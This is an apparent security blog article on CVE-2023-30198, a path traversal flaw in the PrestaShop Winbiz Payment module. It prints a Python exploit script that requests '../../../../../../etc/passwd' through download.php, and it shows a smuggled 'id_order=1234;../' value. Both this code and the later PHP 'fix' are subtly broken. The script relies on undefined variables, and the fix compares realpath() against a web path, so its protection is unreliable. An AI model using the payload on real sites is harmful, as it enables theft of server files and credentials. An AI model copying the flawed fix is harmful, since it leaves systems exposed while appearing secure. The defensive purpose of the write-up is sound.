PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory

Exploiting Path Traversal in PrestaShop Winbiz Payment Module: CVE-2023-30198

Security vulnerabilities in e-commerce platforms are a persistent threat, especially when third-party modules introduce improper input validation. One such critical flaw was discovered in the Winbiz Payment module for PrestaShop, a widely used open-source shopping platform. This vulnerability, identified as CVE-2023-30198, stems from an improper limitation of a pathname to a restricted directory—a classic path traversal issue that allows attackers to access arbitrary files on the server.

Understanding the Vulnerability

The core issue lies in the /modules/winbizpayment/downloads/download.php endpoint, which is designed to allow authorized users to download PDF invoices associated with specific order IDs. However, due to insufficient validation of user-supplied input, an attacker can manipulate the id_order parameter to traverse directories beyond the intended restricted folder.

When a user requests a download via download.php, the module constructs a file path based on the provided id_order. If the application does not sanitize or restrict the path to a predefined directory (e.g., /modules/winbizpayment/downloads/), an attacker can use path traversal sequences like ../../ or ..%2f to access sensitive files outside the intended scope—such as configuration files, database backups, or even administrative credentials.

Real-World Exploit Example

Consider the following attack scenario:

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Craft malicious path traversal to access sensitive files
download_data = {"id_order": "../../../../../../etc/passwd", "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

print("File downloaded to %s" % file_path)

Explanation: This exploit script demonstrates how an authenticated admin user can abuse the id_order parameter to request a file located outside the intended download directory. By setting id_order to ../../../../../../etc/passwd, the attacker attempts to read the system’s password file. If the module lacks proper path sanitization, the server will serve the file, effectively exposing sensitive system information.

Impact and Risk Assessment

Given that the module is used in production environments across Iran and other regions, the implications are significant:

• Data Exposure: Attackers can retrieve configuration files, database dumps, or even private keys stored on the server.
• Privilege Escalation: Access to config.inc.php or settings.php may reveal database credentials or admin passwords.
• Server Compromise: If the module allows file uploads or execution, this vulnerability could serve as a foothold for full server takeover.

According to the NVD (National Vulnerability Database), this issue is rated as High severity due to its potential for unauthorized access and data leakage.

Root Cause Analysis

The vulnerability arises from a failure to implement proper path normalization and restriction. The module should:

• Sanitize user input by removing or blocking .. sequences.
• Use a whitelist of allowed filenames or directory paths.
• Apply canonicalization to resolve path traversal attempts.
• Enforce access control based on user role and session context.

Instead, the vulnerable implementation directly uses the id_order value as a file path component without validation, making it susceptible to attacks like id_order=1234;../../../../etc/passwd.

Security Best Practices and Fixes

Developers and administrators must address this flaw through robust input validation and secure coding practices. Here is a corrected, secure implementation:

// Secure version of download.php logic (PHP pseudo-code)
function secure_download($order_id) {
    $allowed_dir = '/modules/winbizpayment/downloads/';
    $file_path = $allowed_dir . 'order_' . $order_id . '.pdf';

    // Sanitize input to prevent path traversal
    if (preg_match('/^[a-zA-Z0-9_-]+$/', $order_id) === 0) {
        return "Invalid order ID";
    }

    // Normalize path to prevent traversal
    $normalized_path = realpath($file_path);

    // Ensure path is within allowed directory
    if (strpos($normalized_path, $allowed_dir) !== 0) {
        return "Access denied";
    }

    // Check file existence and read permissions
    if (!file_exists($normalized_path) || !is_readable($normalized_path)) {
        return "File not found";
    }

    // Serve the file securely
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="order_' . $order_id . '.pdf"');
    readfile($normalized_path);
}

Explanation: This secure implementation:

• Uses preg_match to restrict input to alphanumeric and underscore characters.
• Applies realpath() to normalize the path and eliminate traversal sequences.
• Verifies that the final path starts with the allowed directory.
• Ensures the file exists and is readable before serving.

These measures prevent attackers from accessing files outside the intended scope.

Recommendations for Users and Admins

For organizations using PrestaShop with the Winbiz Payment module:

• Update Immediately: Upgrade to version 17.1.4 or later, which includes patches for CVE-2023-30198.
• Disable Unused Modules: Remove or disable the Winbiz Payment module if not actively used.
• Monitor File Access: Implement logging for file downloads to detect suspicious patterns.
• Apply WAF Rules: Use a Web Application Firewall (WAF) to block path traversal attempts in URLs.

Conclusion

Path traversal vulnerabilities like CVE-2023-30198 highlight the importance of secure coding practices in third-party modules. Even seemingly minor flaws in input validation can lead to severe data breaches. Developers must prioritize input sanitization, path normalization, and directory restriction to safeguard e-commerce systems. For administrators, timely patching and continuous monitoring are essential to maintain system integrity and protect customer data.